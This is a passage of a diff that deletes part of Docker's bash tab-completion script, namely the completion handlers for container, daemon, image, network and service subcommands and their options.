-	esac
-
-	case "$prev" in
-		--add-host)
-			case "$cur" in
-				*:)
-					__docker_complete_resolved_hostname
-					return
-					;;
-			esac
-			;;
-		--attach|-a)
-			COMPREPLY=( $( compgen -W 'stdin stdout stderr' -- "$cur" ) )
-			return
-			;;
-		--cap-add|--cap-drop)
-			__docker_complete_capabilities
-			return
-			;;
-		--cidfile|--env-file|--init-path|--label-file)
-			_filedir
-			return
-			;;
-		--device|--tmpfs|--volume|-v)
-			case "$cur" in
-				*:*)
-					# TODO somehow do _filedir for stuff inside the image, if it's already specified (which is also somewhat difficult to determine)
-					;;
-				'')
-					COMPREPLY=( $( compgen -W '/' -- "$cur" ) )
-					__docker_nospace
-					;;
-				/*)
-					_filedir
-					__docker_nospace
-					;;
-			esac
-			return
-			;;
-		--env|-e)
-			# we do not append a "=" here because "-e VARNAME" is legal systax, too
-			COMPREPLY=( $( compgen -e -- "$cur" ) )
-			__docker_nospace
-			return
-			;;
-		--ipc)
-			case "$cur" in
-				*:*)
-					cur="${cur#*:}"
-					__docker_complete_containers_running
-					;;
-				*)
-					COMPREPLY=( $( compgen -W 'host container:' -- "$cur" ) )
-					if [ "$COMPREPLY" = "container:" ]; then
-						__docker_nospace
-					fi
-					;;
-			esac
-			return
-			;;
-		--isolation)
-			__docker_complete_isolation
-			return
-			;;
-		--link)
-			case "$cur" in
-				*:*)
-					;;
-				*)
-					__docker_complete_containers_running
-					COMPREPLY=( $( compgen -W "${COMPREPLY[*]}" -S ':' ) )
-					__docker_nospace
-					;;
-			esac
-			return
-			;;
-		--log-driver)
-			__docker_complete_log_drivers
-			return
-			;;
-		--log-opt)
-			__docker_complete_log_options
-			return
-			;;
-		--network)
-			case "$cur" in
-				container:*)
-					__docker_complete_containers_all --cur "${cur#*:}"
-					;;
-				*)
-					COMPREPLY=( $( compgen -W "$(__docker_plugins_bundled --type Network) $(__docker_networks) container:" -- "$cur") )
-					if [ "${COMPREPLY[*]}" = "container:" ] ; then
-						__docker_nospace
-					fi
-					;;
-			esac
-			return
-			;;
-		--pid)
-			case "$cur" in
-				*:*)
-					__docker_complete_containers_running --cur "${cur#*:}"
-					;;
-				*)
-					COMPREPLY=( $( compgen -W 'host container:' -- "$cur" ) )
-					if [ "$COMPREPLY" = "container:" ]; then
-						__docker_nospace
-					fi
-					;;
-			esac
-			return
-			;;
-		--runtime)
-			__docker_complete_runtimes
-			return
-			;;
-		--security-opt)
-			COMPREPLY=( $( compgen -W "apparmor= label= no-new-privileges seccomp=" -- "$cur") )
-			if [ "${COMPREPLY[*]}" != "no-new-privileges" ] ; then
-				__docker_nospace
-			fi
-			return
-			;;
-		--storage-opt)
-			COMPREPLY=( $( compgen -W "size" -S = -- "$cur") )
-			__docker_nospace
-			return
-			;;
-		--user|-u)
-			__docker_complete_user_group
-			return
-			;;
-		--userns)
-			COMPREPLY=( $( compgen -W "host" -- "$cur" ) )
-			return
-			;;
-		--volume-driver)
-			__docker_complete_plugins_bundled --type Volume
-			return
-			;;
-		--volumes-from)
-			__docker_complete_containers_all
-			return
-			;;
-		$(__docker_to_extglob "$options_with_args") )
-			return
-			;;
-	esac
-
-	case "$cur" in
-		-*)
-			COMPREPLY=( $( compgen -W "$all_options" -- "$cur" ) )
-			;;
-		*)
-			local counter=$( __docker_pos_first_nonflag $( __docker_to_alternatives "$options_with_args" ) )
-			if [ $cword -eq $counter ]; then
-				__docker_complete_images
-			fi
-			;;
-	esac
-}
-
-_docker_container_start() {
-	__docker_complete_detach-keys && return
-
-	case "$prev" in
-		--checkpoint)
-			if [ __docker_is_experimental ] ; then
-				return
-			fi
-			;;
-		--checkpoint-dir)
-			if [ __docker_is_experimental ] ; then
-				_filedir -d
-				return
-			fi
-			;;
-	esac
-
-	case "$cur" in
-		-*)
-			local options="--attach -a --detach-keys --help --interactive -i"
-			__docker_is_experimental && options+=" --checkpoint --checkpoint-dir"
-			COMPREPLY=( $( compgen -W "$options" -- "$cur" ) )
-			;;
-		*)
-			__docker_complete_containers_stopped
-			;;
-	esac
-}
-
-_docker_container_stats() {
-	case "$prev" in
-		--format)
-			return
-			;;
-	esac
-
-	case "$cur" in
-		-*)
-			COMPREPLY=( $( compgen -W "--all -a --format --help --no-stream" -- "$cur" ) )
-			;;
-		*)
-			__docker_complete_containers_running
-			;;
-	esac
-}
-
-_docker_container_stop() {
-	case "$prev" in
-		--time|-t)
-			return
-			;;
-	esac
-
-	case "$cur" in
-		-*)
-			COMPREPLY=( $( compgen -W "--help --time -t" -- "$cur" ) )
-			;;
-		*)
-			__docker_complete_containers_running
-			;;
-	esac
-}
-
-_docker_container_top() {
-	case "$cur" in
-		-*)
-			COMPREPLY=( $( compgen -W "--help" -- "$cur" ) )
-			;;
-		*)
-			local counter=$(__docker_pos_first_nonflag)
-			if [ $cword -eq $counter ]; then
-				__docker_complete_containers_running
-			fi
-			;;
-	esac
-}
-
-_docker_container_unpause() {
-	case "$cur" in
-		-*)
-			COMPREPLY=( $( compgen -W "--help" -- "$cur" ) )
-			;;
-		*)
-			local counter=$(__docker_pos_first_nonflag)
-			if [ $cword -eq $counter ]; then
-				__docker_complete_containers_unpauseable
-			fi
-			;;
-	esac
-}
-
-_docker_container_update() {
-	local options_with_args="
-		--blkio-weight
-		--cpu-period
-		--cpu-quota
-		--cpu-rt-period
-		--cpu-rt-runtime
-		--cpuset-cpus
-		--cpuset-mems
-		--cpu-shares -c
-		--kernel-memory
-		--memory -m
-		--memory-reservation
-		--memory-swap
-		--restart
-	"
-
-	local boolean_options="
-		--help
-	"
-
-	local all_options="$options_with_args $boolean_options"
-
-	__docker_complete_restart && return
-
-	case "$prev" in
-		$(__docker_to_extglob "$options_with_args") )
-			return
-			;;
-	esac
-
-	case "$cur" in
-		-*)
-			COMPREPLY=( $( compgen -W "$all_options" -- "$cur" ) )
-			;;
-		*)
-			__docker_complete_containers_all
-			;;
-	esac
-}
-
-_docker_container_wait() {
-	case "$cur" in
-		-*)
-			COMPREPLY=( $( compgen -W "--help" -- "$cur" ) )
-			;;
-		*)
-			__docker_complete_containers_all
-			;;
-	esac
-}
-
-
-_docker_commit() {
-	_docker_container_commit
-}
-
-_docker_cp() {
-	_docker_container_cp
-}
-
-_docker_create() {
-	_docker_container_run
-}
-
-_docker_daemon() {
-	local boolean_options="
-		$global_boolean_options
-		--disable-legacy-registry
-		--experimental
-		--help
-		--icc=false
-		--init
-		--ip-forward=false
-		--ip-masq=false
-		--iptables=false
-		--ipv6
-		--live-restore
-		--raw-logs
-		--selinux-enabled
-		--userland-proxy=false
-	"
-	local options_with_args="
-		$global_options_with_args
-		--add-runtime
-		--api-cors-header
-		--authorization-plugin
-		--bip
-		--bridge -b
-		--cgroup-parent
-		--cluster-advertise
-		--cluster-store
-		--cluster-store-opt
-		--config-file
-		--containerd
-		--default-gateway
-		--default-gateway-v6
-		--default-ulimit
-		--dns
-		--dns-search
-		--dns-opt
-		--exec-opt
-		--exec-root
-		--fixed-cidr
-		--fixed-cidr-v6
-		--graph -g
-		--group -G
-		--init-path
-		--insecure-registry
-		--ip
-		--label
-		--log-driver
-		--log-opt
-		--max-concurrent-downloads
-		--max-concurrent-uploads
-		--mtu
-		--oom-score-adjust
-		--pidfile -p
-		--registry-mirror
-		--seccomp-profile
-		--shutdown-timeout
-		--storage-driver -s
-		--storage-opt
-		--userland-proxy-path
-		--userns-remap
-	"
-
-	__docker_complete_log_driver_options && return
-
- 	key=$(__docker_map_key_of_current_option '--cluster-store-opt')
- 	case "$key" in
- 		kv.*file)
-			cur=${cur##*=}
- 			_filedir
- 			return
- 			;;
- 	esac
-
- 	local key=$(__docker_map_key_of_current_option '--storage-opt')
- 	case "$key" in
- 		dm.blkdiscard|dm.override_udev_sync_check|dm.use_deferred_removal|dm.use_deferred_deletion)
- 			COMPREPLY=( $( compgen -W "false true" -- "${cur##*=}" ) )
- 			return
- 			;;
- 		dm.fs)
- 			COMPREPLY=( $( compgen -W "ext4 xfs" -- "${cur##*=}" ) )
- 			return
- 			;;
- 		dm.thinpooldev)
-			cur=${cur##*=}
- 			_filedir
- 			return
- 			;;
- 	esac
-
-	case "$prev" in
-		--authorization-plugin)
-			__docker_complete_plugins_bundled --type Authorization
-			return
-			;;
-		--cluster-store)
-			COMPREPLY=( $( compgen -W "consul etcd zk" -S "://" -- "$cur" ) )
-			__docker_nospace
-			return
-			;;
-		--cluster-store-opt)
-			COMPREPLY=( $( compgen -W "discovery.heartbeat discovery.ttl kv.cacertfile kv.certfile kv.keyfile kv.path" -S = -- "$cur" ) )
-			__docker_nospace
-			return
-			;;
-		--config-file|--containerd|--init-path|--pidfile|-p|--tlscacert|--tlscert|--tlskey|--userland-proxy-path)
-			_filedir
-			return
-			;;
-		--exec-root|--graph|-g)
-			_filedir -d
-			return
-			;;
-		--log-driver)
-			__docker_complete_log_drivers
-			return
-			;;
-		--storage-driver|-s)
-			COMPREPLY=( $( compgen -W "aufs btrfs devicemapper overlay  overlay2 vfs zfs" -- "$(echo $cur | tr '[:upper:]' '[:lower:]')" ) )
-			return
-			;;
-		--storage-opt)
-			local btrfs_options="btrfs.min_space"
-			local devicemapper_options="
-				dm.basesize
-				dm.blkdiscard
-				dm.blocksize
-				dm.fs
-				dm.loopdatasize
-				dm.loopmetadatasize
-				dm.min_free_space
-				dm.mkfsarg
-				dm.mountopt
-				dm.override_udev_sync_check
-				dm.thinpooldev
-				dm.use_deferred_deletion
-				dm.use_deferred_removal
-			"
-			local zfs_options="zfs.fsname"
-
-			case $(__docker_value_of_option '--storage-driver|-s') in
-				'')
-					COMPREPLY=( $( compgen -W "$btrfs_options $devicemapper_options $zfs_options" -S = -- "$cur" ) )
-					;;
-				btrfs)
-					COMPREPLY=( $( compgen -W "$btrfs_options" -S = -- "$cur" ) )
-					;;
-				devicemapper)
-					COMPREPLY=( $( compgen -W "$devicemapper_options" -S = -- "$cur" ) )
-					;;
-				zfs)
-					COMPREPLY=( $( compgen -W "$zfs_options" -S = -- "$cur" ) )
-					;;
-				*)
-					return
-					;;
-			esac
-			__docker_nospace
-			return
-			;;
-		--log-level|-l)
-			__docker_complete_log_levels
-			return
-			;;
-		--log-opt)
-			__docker_complete_log_options
-			return
-			;;
-		--seccomp-profile)
-			_filedir json
-			return
-			;;
-		--userns-remap)
-			__docker_complete_user_group
-			return
-			;;
-		$(__docker_to_extglob "$options_with_args") )
-			return
-			;;
-	esac
-
-	case "$cur" in
-		-*)
-			COMPREPLY=( $( compgen -W "$boolean_options $options_with_args" -- "$cur" ) )
-			;;
-	esac
-}
-
-_docker_deploy() {
-	__docker_is_experimental && _docker_stack_deploy
-}
-
-_docker_diff() {
-	_docker_container_diff
-}
-
-_docker_events() {
-	_docker_system_events
-}
-
-_docker_exec() {
-	_docker_container_exec
-}
-
-_docker_export() {
-	_docker_container_export
-}
-
-_docker_help() {
-	local counter=$(__docker_pos_first_nonflag)
-	if [ $cword -eq $counter ]; then
-		COMPREPLY=( $( compgen -W "${commands[*]}" -- "$cur" ) )
-	fi
-}
-
-_docker_history() {
-	_docker_image_history
-}
-
-
-_docker_image() {
-	local subcommands="
-		build
-		history
-		import
-		inspect
-		load
-		ls
-		prune
-		pull
-		push
-		rm
-		save
-		tag
-	"
-	local aliases="
-		images
-		list
-		remove
-		rmi
-	"
-	__docker_subcommands "$subcommands $aliases" && return
-
-	case "$cur" in
-		-*)
-			COMPREPLY=( $( compgen -W "--help" -- "$cur" ) )
-			;;
-		*)
-			COMPREPLY=( $( compgen -W "$subcommands" -- "$cur" ) )
-			;;
-	esac
-}
-
-_docker_image_build() {
-	local options_with_args="
-		--build-arg
-		--cache-from
-		--cgroup-parent
-		--cpuset-cpus
-		--cpuset-mems
-		--cpu-shares -c
-		--cpu-period
-		--cpu-quota
-		--file -f
-		--isolation
-		--label
-		--memory -m
-		--memory-swap
-		--network
-		--shm-size
-		--tag -t
-		--ulimit
-	"
-
-	local boolean_options="
-		--compress
-		--disable-content-trust=false
-		--force-rm
-		--help
-		--no-cache
-		--pull
-		--quiet -q
-		--rm
-	"
-	__docker_is_experimental && boolean_options+="--squash"
-
-	local all_options="$options_with_args $boolean_options"
-
-	case "$prev" in
-		--build-arg)
-			COMPREPLY=( $( compgen -e -- "$cur" ) )
-			__docker_nospace
-			return
-			;;
-		--cache-from)
-			__docker_complete_image_repos_and_tags
-			return
-			;;
-		--file|-f)
-			_filedir
-			return
-			;;
-		--isolation)
-			__docker_complete_isolation
-			return
-			;;
-		--network)
-			case "$cur" in
-				container:*)
-					__docker_complete_containers_all --cur "${cur#*:}"
-					;;
-				*)
-					COMPREPLY=( $( compgen -W "$(__docker_plugins --type Network) $(__docker_networks) container:" -- "$cur") )
-					if [ "${COMPREPLY[*]}" = "container:" ] ; then
-						__docker_nospace
-					fi
-					;;
-			esac
-			return
-			;;
-		--tag|-t)
-			__docker_complete_image_repos_and_tags
-			return
-			;;
-		$(__docker_to_extglob "$options_with_args") )
-			return
-			;;
-	esac
-
-	case "$cur" in
-		-*)
-			COMPREPLY=( $( compgen -W "$all_options" -- "$cur" ) )
-			;;
-		*)
-			local counter=$( __docker_pos_first_nonflag $( __docker_to_alternatives "$options_with_args" ) )
-			if [ $cword -eq $counter ]; then
-				_filedir -d
-			fi
-			;;
-	esac
-}
-
-_docker_image_history() {
-	case "$cur" in
-		-*)
-			COMPREPLY=( $( compgen -W "--help --human=false -H=false --no-trunc --quiet -q" -- "$cur" ) )
-			;;
-		*)
-			local counter=$(__docker_pos_first_nonflag)
-			if [ $cword -eq $counter ]; then
-				__docker_complete_images
-			fi
-			;;
-	esac
-}
-
-_docker_image_images() {
-	_docker_image_ls
-}
-
-_docker_image_import() {
-	case "$prev" in
-		--change|-c|--message|-m)
-			return
-			;;
-	esac
-
-	case "$cur" in
-		-*)
-			COMPREPLY=( $( compgen -W "--change -c --help --message -m" -- "$cur" ) )
-			;;
-		*)
-			local counter=$(__docker_pos_first_nonflag '--change|-c|--message|-m')
-			if [ $cword -eq $counter ]; then
-				return
-			fi
-			(( counter++ ))
-
-			if [ $cword -eq $counter ]; then
-				__docker_complete_image_repos_and_tags
-				return
-			fi
-			;;
-	esac
-}
-
-_docker_image_inspect() {
-	_docker_inspect --type image
-}
-
-_docker_image_load() {
-	case "$prev" in
-		--input|-i)
-			_filedir
-			return
-			;;
-	esac
-
-	case "$cur" in
-		-*)
-			COMPREPLY=( $( compgen -W "--help --input -i --quiet -q" -- "$cur" ) )
-			;;
-	esac
-}
-
-_docker_image_list() {
-	_docker_image_ls
-}
-
-_docker_image_ls() {
-	local key=$(__docker_map_key_of_current_option '--filter|-f')
-	case "$key" in
-		before|since|reference)
-			cur="${cur##*=}"
-			__docker_complete_images
-			return
-			;;
-		dangling)
-			COMPREPLY=( $( compgen -W "false true" -- "${cur##*=}" ) )
-			return
-			;;
-		label)
-			return
-			;;
-	esac
-
-	case "$prev" in
-		--filter|-f)
-			COMPREPLY=( $( compgen -S = -W "before dangling label reference since" -- "$cur" ) )
-			__docker_nospace
-			return
-			;;
-                --format)
-			return
-			;;
-	esac
-
-	case "$cur" in
-		-*)
-			COMPREPLY=( $( compgen -W "--all -a --digests --filter -f --format --help --no-trunc --quiet -q" -- "$cur" ) )
-			;;
-		=)
-			return
-			;;
-		*)
-			__docker_complete_image_repos
-			;;
-	esac
-}
-
-_docker_image_prune() {
-	case "$cur" in
-		-*)
-			COMPREPLY=( $( compgen -W "--all -a --force -f --help" -- "$cur" ) )
-			;;
-	esac
-}
-
-_docker_image_pull() {
-	case "$cur" in
-		-*)
-			COMPREPLY=( $( compgen -W "--all-tags -a --disable-content-trust=false --help" -- "$cur" ) )
-			;;
-		*)
-			local counter=$(__docker_pos_first_nonflag)
-			if [ $cword -eq $counter ]; then
-				for arg in "${COMP_WORDS[@]}"; do
-					case "$arg" in
-						--all-tags|-a)
-							__docker_complete_image_repos
-							return
-							;;
-					esac
-				done
-				__docker_complete_image_repos_and_tags
-			fi
-			;;
-	esac
-}
-
-_docker_image_push() {
-	case "$cur" in
-		-*)
-			COMPREPLY=( $( compgen -W "--disable-content-trust=false --help" -- "$cur" ) )
-			;;
-		*)
-			local counter=$(__docker_pos_first_nonflag)
-			if [ $cword -eq $counter ]; then
-				__docker_complete_image_repos_and_tags
-			fi
-			;;
-	esac
-}
-
-_docker_image_remove() {
-	_docker_image_rm
-}
-
-_docker_image_rm() {
-	case "$cur" in
-		-*)
-			COMPREPLY=( $( compgen -W "--force -f --help --no-prune" -- "$cur" ) )
-			;;
-		*)
-			__docker_complete_images
-			;;
-	esac
-}
-
-_docker_image_rmi() {
-	_docker_image_rm
-}
-
-_docker_image_save() {
-	case "$prev" in
-		--output|-o)
-			_filedir
-			return
-			;;
-	esac
-
-	case "$cur" in
-		-*)
-			COMPREPLY=( $( compgen -W "--help --output -o" -- "$cur" ) )
-			;;
-		*)
-			__docker_complete_images
-			;;
-	esac
-}
-
-_docker_image_tag() {
-	case "$cur" in
-		-*)
-			COMPREPLY=( $( compgen -W "--help" -- "$cur" ) )
-			;;
-		*)
-			local counter=$(__docker_pos_first_nonflag)
-
-			if [ $cword -eq $counter ]; then
-				__docker_complete_image_repos_and_tags
-				return
-			fi
-			(( counter++ ))
-
-			if [ $cword -eq $counter ]; then
-				__docker_complete_image_repos_and_tags
-				return
-			fi
-			;;
-	esac
-}
-
-
-_docker_images() {
-	_docker_image_ls
-}
-
-_docker_import() {
-	_docker_image_import
-}
-
-_docker_info() {
-	_docker_system_info
-}
-
-_docker_inspect() {
-	local preselected_type
-	local type
-
-	if [ "$1" = "--type" ] ; then
-		preselected_type=yes
-		type="$2"
-	else
-		type=$(__docker_value_of_option --type)
-	fi
-
-	case "$prev" in
-		--format|-f)
-			return
-			;;
-		--type)
-			if [ -z "$preselected_type" ] ; then
-				COMPREPLY=( $( compgen -W "container image network node plugin service volume" -- "$cur" ) )
-				return
-			fi
-			;;
-	esac
-
-	case "$cur" in
-		-*)
-			local options="--format -f --help --size -s"
-			if [ -z "$preselected_type" ] ; then
-				options+=" --type"
-			fi
-			COMPREPLY=( $( compgen -W "$options" -- "$cur" ) )
-			;;
-		*)
-			case "$type" in
-				'')
-					COMPREPLY=( $( compgen -W "
-						$(__docker_containers --all)
-						$(__docker_images)
-						$(__docker_networks)
-						$(__docker_nodes)
-						$(__docker_plugins_installed)
-						$(__docker_services)
-						$(__docker_volumes)
-					" -- "$cur" ) )
-					;;
-				container)
-					__docker_complete_containers_all
-					;;
-				image)
-					__docker_complete_images
-					;;
-				network)
-					__docker_complete_networks
-					;;
-				node)
-					__docker_complete_nodes
-					;;
-				plugin)
-					__docker_complete_plugins_installed
-					;;
-				service)
-					__docker_complete_services
-					;;
-				volume)
-					__docker_complete_volumes
-					;;
-			esac
-	esac
-}
-
-_docker_kill() {
-	_docker_container_kill
-}
-
-_docker_load() {
-	_docker_image_load
-}
-
-_docker_login() {
-	case "$prev" in
-		--password|-p|--username|-u)
-			return
-			;;
-	esac
-
-	case "$cur" in
-		-*)
-			COMPREPLY=( $( compgen -W "--help --password -p --username -u" -- "$cur" ) )
-			;;
-	esac
-}
-
-_docker_logout() {
-	case "$cur" in
-		-*)
-			COMPREPLY=( $( compgen -W "--help" -- "$cur" ) )
-			;;
-	esac
-}
-
-_docker_logs() {
-	_docker_container_logs
-}
-
-_docker_network_connect() {
-	local options_with_args="
-		--alias
-		--ip
-		--ip6
-		--link
-		--link-local-ip
-	"
-
-	local boolean_options="
-		--help
-	"
-
-	case "$prev" in
-		--link)
-			case "$cur" in
-				*:*)
-					;;
-				*)
-					__docker_complete_containers_running
-					COMPREPLY=( $( compgen -W "${COMPREPLY[*]}" -S ':' ) )
-					__docker_nospace
-					;;
-			esac
-			return
-			;;
-		$(__docker_to_extglob "$options_with_args") )
-			return
-			;;
-	esac
-
-	case "$cur" in
-		-*)
-			COMPREPLY=( $( compgen -W "$boolean_options $options_with_args" -- "$cur" ) )
-			;;
-		*)
-			local counter=$( __docker_pos_first_nonflag $( __docker_to_alternatives "$options_with_args" ) )
-			if [ $cword -eq $counter ]; then
-				__docker_complete_networks
-			elif [ $cword -eq $(($counter + 1)) ]; then
-				__docker_complete_containers_all
-			fi
-			;;
-	esac
-}
-
-_docker_network_create() {
-	case "$prev" in
-		--aux-address|--gateway|--internal|--ip-range|--ipam-opt|--ipv6|--opt|-o|--subnet)
-			return
-			;;
-		--ipam-driver)
-			COMPREPLY=( $( compgen -W "default" -- "$cur" ) )
-			return
-			;;
-		--driver|-d)
-			# remove drivers that allow one instance only, add drivers missing in `docker info`
-			__docker_complete_plugins_bundled --type Network --remove host --remove null --add macvlan
-			return
-			;;
-		--label)
-			return
-			;;
-	esac
-
-	case "$cur" in
-		-*)
-			COMPREPLY=( $( compgen -W "--attachable --aux-address --driver -d --gateway --help --internal --ip-range --ipam-driver --ipam-opt --ipv6 --label --opt -o --subnet" -- "$cur" ) )
-			;;
-	esac
-}
-
-_docker_network_disconnect() {
-	case "$cur" in
-		-*)
-			COMPREPLY=( $( compgen -W "--help" -- "$cur" ) )
-			;;
-		*)
-			local counter=$(__docker_pos_first_nonflag)
-			if [ $cword -eq $counter ]; then
-				__docker_complete_networks
-			elif [ $cword -eq $(($counter + 1)) ]; then
-				__docker_complete_containers_in_network "$prev"
-			fi
-			;;
-	esac
-}
-
-_docker_network_inspect() {
-	case "$prev" in
-		--format|-f)
-			return
-			;;
-	esac
-
-	case "$cur" in
-		-*)
-			COMPREPLY=( $( compgen -W "--format -f --help" -- "$cur" ) )
-			;;
-		*)
-			__docker_complete_networks
-	esac
-}
-
-_docker_network_ls() {
-	local key=$(__docker_map_key_of_current_option '--filter|-f')
-	case "$key" in
-		driver)
-			__docker_complete_plugins_bundled --cur "${cur##*=}" --type Network --add macvlan
-			return
-			;;
-		id)
-			__docker_complete_networks --cur "${cur##*=}" --id
-			return
-			;;
-		name)
-			__docker_complete_networks --cur "${cur##*=}" --name
-			return
-			;;
-		type)
-			COMPREPLY=( $( compgen -W "builtin custom" -- "${cur##*=}" ) )
-			return
-			;;
-	esac
-
-	case "$prev" in
-		--filter|-f)
-			COMPREPLY=( $( compgen -S = -W "driver id label name type" -- "$cur" ) )
-			__docker_nospace
-			return
-			;;
-		--format)
-			return
-			;;
-	esac
-
-	case "$cur" in
-		-*)
-			COMPREPLY=( $( compgen -W "--filter -f --format --help --no-trunc --quiet -q" -- "$cur" ) )
-			;;
-	esac
-}
-
-_docker_network_prune() {
-	case "$cur" in
-		-*)
-			COMPREPLY=( $( compgen -W "--force -f --help" -- "$cur" ) )
-			;;
-	esac
-}
-
-_docker_network_rm() {
-	case "$cur" in
-		-*)
-			COMPREPLY=( $( compgen -W "--help" -- "$cur" ) )
-			;;
-		*)
-			__docker_complete_networks --filter type=custom
-	esac
-}
-
-_docker_network() {
-	local subcommands="
-		connect
-		create
-		disconnect
-		inspect
-		ls
-		prune
-		rm
-	"
-	__docker_subcommands "$subcommands" && return
-
-	case "$cur" in
-		-*)
-			COMPREPLY=( $( compgen -W "--help" -- "$cur" ) )
-			;;
-		*)
-			COMPREPLY=( $( compgen -W "$subcommands" -- "$cur" ) )
-			;;
-	esac
-}
-
-_docker_service() {
-	local subcommands="
-		create
-		inspect
-		ls list
-		rm remove
-		scale
-		ps
-		update
-	"
-	__docker_daemon_is_experimental && subcommands+="logs"
-
-	__docker_subcommands "$subcommands" && return
-
-	case "$cur" in
-		-*)
-			COMPREPLY=( $( compgen -W "--help" -- "$cur" ) )
-			;;
-		*)
-			COMPREPLY=( $( compgen -W "$subcommands" -- "$cur" ) )
-			;;
-	esac
-}
-
-_docker_service_create() {
-	_docker_service_update
-}
-
-_docker_service_inspect() {
-	case "$prev" in
-		--format|-f)
-			return
-			;;
-	esac
-
-	case "$cur" in
-		-*)
-			COMPREPLY=( $( compgen -W "--format -f --help --pretty" -- "$cur" ) )
-			;;
-		*)
-			__docker_complete_services
-	esac
-}
-
-_docker_service_logs() {
-	case "$prev" in
-		--since|--tail)
-			return
-			;;
-	esac
-
-	case "$cur" in
-		-*)
-			COMPREPLY=( $( compgen -W "--details --follow -f --help --no-resolve --since --tail --timestamps -t" -- "$cur" ) )
-			;;
-		*)
-			local counter=$(__docker_pos_first_nonflag '--since|--tail')
-			if [ $cword -eq $counter ]; then
-				__docker_complete_services
-			fi
-			;;
-	esac
-}
-
-_docker_service_list() {
-	_docker_service_ls
-}
-
-_docker_service_ls() {
-	local key=$(__docker_map_key_of_current_option '--filter|-f')
-	case "$key" in
-		id)
-			__docker_complete_services --cur "${cur##*=}" --id
-			return
-			;;
-		name)
-			__docker_complete_services --cur "${cur##*=}" --name
-			return
-			;;
-	esac
-
-	case "$prev" in
-		--filter|-f)
-			COMPREPLY=( $( compgen -W "id label name" -S = -- "$cur" ) )
-			__docker_nospace
-			return
-			;;
-	esac
-
-	case "$cur" in
-		-*)
-			COMPREPLY=( $( compgen -W "--filter -f --help --quiet -q" -- "$cur" ) )
-			;;
-	esac
-}
-
-_docker_service_remove() {
-	_docker_service_rm
-}
-
-_docker_service_rm() {
-	case "$cur" in
-		-*)
-			COMPREPLY=( $( compgen -W "--help" -- "$cur" ) )
-			;;
-		*)
-			__docker_complete_services
-	esac
-}
-
-_docker_service_scale() {
-	case "$cur" in
-		-*)
-			COMPREPLY=( $( compgen -W "--help" -- "$cur" ) )
-			;;
-		*)
-			__docker_complete_services
-			__docker_append_to_completions "="
-			__docker_nospace
-			;;
-	esac
-}
-
-_docker_service_ps() {
-	local key=$(__docker_map_key_of_current_option '--filter|-f')
-	case "$key" in
-		desired-state)
-			COMPREPLY=( $( compgen -W "accepted running" -- "${cur##*=}" ) )
-			return
-			;;
-		name)
-			__docker_complete_services --cur "${cur##*=}" --name
-			return
-			;;
-		node)
-			__docker_complete_nodes_plus_self --cur "${cur##*=}"
-			return
-			;;
-	esac
-
-	case "$prev" in
-		--filter|-f)
-			COMPREPLY=( $( compgen -W "desired-state id name node" -S = -- "$cur" ) )
-			__docker_nospace
-			return
-			;;
-	esac
-
-	case "$cur" in
-		-*)
-			COMPREPLY=( $( compgen -W "--filter -f --help --no-resolve --no-trunc --quiet -q" -- "$cur" ) )
-			;;
-		*)
-			local counter=$(__docker_pos_first_nonflag '--filter|-f')
-			if [ $cword -eq $counter ]; then
-				__docker_complete_services
-			fi
-			;;
-	esac
-}
-
-_docker_service_update() {
-	local $subcommand="${words[$subcommand_pos]}"
-
-	local options_with_args="
-		--constraint
-		--endpoint-mode
-		--env -e
-		--force
-		--health-cmd
-		--health-interval
-		--health-retries
-		--health-timeout
-		--hostname
-		--label -l
-		--limit-cpu
-		--limit-memory
-		--log-driver
-		--log-opt
-		--mount
-		--network
-		--no-healthcheck
-		--replicas
-		--reserve-cpu
-		--reserve-memory
-		--restart-condition
-		--restart-delay
-		--restart-max-attempts
-		--restart-window
-		--rollback
-		--stop-grace-period
-		--update-delay
-		--update-failure-action
-		--update-max-failure-ratio
-		--update-monitor
-		--update-parallelism
-		--user -u
-		--workdir -w
-	"
-
-	local boolean_options="
-		--help
-		--tty -t
-		--with-registry-auth
-	"
-
-	__docker_complete_log_driver_options && return
-
-	if [ "$subcommand" = "create" ] ; then
-		options_with_args="$options_with_args
-			--container-label
-			--dns
-			--dns-option
-			--dns-search
-			--env-file
-			--group
-			--host
-			--mode
-			--name
-			--publish -p
-			--secret
-		"
-
-		case "$prev" in
-			--env-file)
-				_filedir
-				return
-				;;
-			--host)
-				case "$cur" in
-					*:)
-						__docker_complete_resolved_hostname
-						return
-						;;
-				esac
-				;;
-			--mode)
-				COMPREPLY=( $( compgen -W "global replicated" -- "$cur" ) )
-				return
-				;;
-			--secret)
-				__docker_complete_secrets
-				return
-				;;
-			--group)
-			COMPREPLY=( $(compgen -g -- "$cur") )
-			return
-			;;
-		esac
-	fi
-	if [ "$subcommand" = "update" ] ; then
-		options_with_args="$options_with_args
-			--arg
-			--container-label-add
-			--container-label-rm
-			--dns-add
-			--dns-option-add
-			--dns-option-rm
-			--dns-rm
-			--dns-search-add
-			--dns-search-rm
-			--group-add
-			--group-rm
-			--host-add
-			--host-rm
-			--image
-			--publish-add
-			--publish-rm
-			--secret-add
-			--secret-rm
-		"
-
-		case "$prev" in
-			--group-add)
-				COMPREPLY=( $(compgen -g -- "$cur") )
-				return
-				;;
-			--group-rm)
-				COMPREPLY=( $(compgen -g -- "$cur") )
-				return
-				;;
-			--host-add|--host-rm)
-				case "$cur" in
-					*:)
-						__docker_complete_resolved_hostname
-						return
-						;;
-				esac
-				;;
-			--image)
-				__docker_complete_image_repos_and_tags
-				return
-				;;
-			--secret-add|--secret-rm)
-				__docker_complete_secrets
-				return
-				;;
-		esac
-	fi
-
-	case "$prev" in
-		--endpoint-mode)
-			COMPREPLY=( $( compgen -W "dnsrr vip" -- "$cur" ) )
-			return
-			;;
-		--env|-e)
-			# we do not append a "=" here because "-e VARNAME" is legal systax, too
-			COMPREPLY=( $( compgen -e -- "$cur" ) )
-			__docker_nospace
-			return
-			;;
-		--log-driver)
-			__docker_complete_log_drivers
-			return
-			;;
-		--log-opt)
-			__docker_complete_log_options
-			return
-			;;
-		--network)
-			__docker_complete_networks
-			return
-			;;
-		--restart-condition)
-			COMPREPLY=( $( compgen -W "any none on-failure" -- "$cur" ) )
-			return
-			;;
-		--user|-u)
-			__docker_complete_user_group
-			return
-			;;
-		$(__docker_to_extglob "$options_with_args") )
-			return
-			;;
-	esac
-
-	case "$cur" in
-		-*)
-			COMPREPLY=( $( compgen -W "$boolean_options $options_with_args" -- "$cur" ) )
-			;;
-		*)
-			local counter=$( __docker_pos_first_nonflag $( __docker_to_alternatives "$options_with_args" ) )
-			if [ "$subcommand" = "update" ] ; then
-				if [ $cword -eq $counter ]; then
-					__docker_complete_services
-				fi
